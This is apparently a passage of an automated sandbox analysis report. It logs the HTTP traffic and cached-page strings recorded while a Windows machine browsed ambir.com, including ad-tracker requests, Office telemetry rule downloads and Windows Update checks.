      Source: global trafficHTTP traffic detected: GET /xuid?ld=1&mid=4714&xuid=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&dongle=c85e&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluid=3480130029132749815081
      Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D172%26code%3DMTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U HTTP/1.1Host: ib.adnxs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uuid2=804763998252466527; anj=dTM7k!M4/rD>6NRF']wIg2H`iqiONk!@wnfH1Ya.O4]7Q=E?FR1fuAAjE.>52HHn%j*C@!lKG_5/Omf^iq=-8l[<#(2R^eBj(=ni@4uw!pB!tEP(hw9P-HC_#u#UT+r=8E
      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /uev0?xae1=GXXT3DJJNNBKHGBC62RAND&xen1=productView&xoe1=YK5WPZRLU5ADVBKNOYLBSZ&xpe1=PQV7D44IFRBCBMEQBHSAR6 HTTP/1.1Host: d.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513
      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cHrHpX4bmlX+nvl&MD=3MZpu8fr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /nrpc/p?j=olark-11732134538640&&c=pollevents&q=828.38639.1&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&g=undefined&cb=hbl.client.callbacks.pollevents&next_poll_time=15000&version=api-1.2.1&pretty=true&_rnd=0.8438471990110759 HTTP/1.1Host: knrpc.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /nrpc/p?j=olark-11732134538640&&c=pollevents&q=828.38639.1&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&g=undefined&cb=hbl.client.callbacks.pollevents&next_poll_time=15000&version=api-1.2.1&pretty=true&_rnd=0.8438471990110759 HTTP/1.1Host: knrpc.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /nrpc/p?j=olark-21732134555374&&c=pollevents&q=6387.55374.2&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&g=undefined&cb=hbl.client.callbacks.pollevents&next_poll_time=15000&version=api-1.2.1&pretty=true&_rnd=0.7786832371860779 HTTP/1.1Host: knrpc.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /nrpc/p?j=olark-21732134555374&&c=pollevents&q=6387.55374.2&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&g=undefined&cb=hbl.client.callbacks.pollevents&next_poll_time=15000&version=api-1.2.1&pretty=true&_rnd=0.7786832371860779 HTTP/1.1Host: knrpc.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: chromecache_181.2.drString found in binary or memory: <a href="https://www.facebook.com/ambirtechnology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/fb.jpg"></a> <a href="https://www.linkedin.com/company/ambir-technology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/linkedin.jpg"></a> <a href="https://twitter.com/ambirtechnology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/twitter.jpg"></a> <a href="https://www.youtube.com/channel/UCN87hTTavP6CHRiUK9JGz_w" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/youtube.jpg"></a> equals www.facebook.com (Facebook)
      Source: chromecache_181.2.drString found in binary or memory: <a href="https://www.facebook.com/ambirtechnology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/fb.jpg"></a> <a href="https://www.linkedin.com/company/ambir-technology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/linkedin.jpg"></a> <a href="https://twitter.com/ambirtechnology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/twitter.jpg"></a> <a href="https://www.youtube.com/channel/UCN87hTTavP6CHRiUK9JGz_w" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/youtube.jpg"></a> equals www.linkedin.com (Linkedin)
      Source: chromecache_181.2.drString found in binary or memory: <a href="https://www.facebook.com/ambirtechnology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/fb.jpg"></a> <a href="https://www.linkedin.com/company/ambir-technology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/linkedin.jpg"></a> <a href="https://twitter.com/ambirtechnology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/twitter.jpg"></a> <a href="https://www.youtube.com/channel/UCN87hTTavP6CHRiUK9JGz_w" target="_blank"><img decoding="async" 